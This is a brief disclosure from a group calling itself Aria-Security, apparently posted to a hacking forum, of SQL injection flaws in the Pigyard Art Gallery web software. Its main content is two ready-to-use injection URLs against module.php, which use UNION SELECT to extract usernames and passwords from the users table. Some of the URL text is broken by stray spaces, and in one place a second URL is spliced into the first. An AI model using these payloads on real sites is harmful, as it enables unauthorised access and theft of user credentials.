Aria-Security Team,
http://Aria-Security.net
-------------------------------
Shout Outs: AurA, imm02tal, iM4N, Kinglet,
Vendor: Pigyard Art Gallery Multiple SQL Injection
This is a completation of the original advisory reported by ZoRLu @ Milw0rm (http://www.milw0rm.com/exploits/5181)

Original Link: http://forum.aria-security.net/showthread.php?p=1474

module.php?module=gallery&modPage=show_picture_ful l&artist=&exhibition=&portfolio=true&sort=price&st art=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*
module.php?module=gallery&modPage=show_picture_ful l&artist=16&exhibition=&portfolio=module.php?modul e=gallery&modPage=show_picture_full&artist=&exhibi tion=&portfolio=true&sort=price&start=1&filterbyar tist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*


Regards,
The-0utl4w
Credits Goes To Aria-Security.Net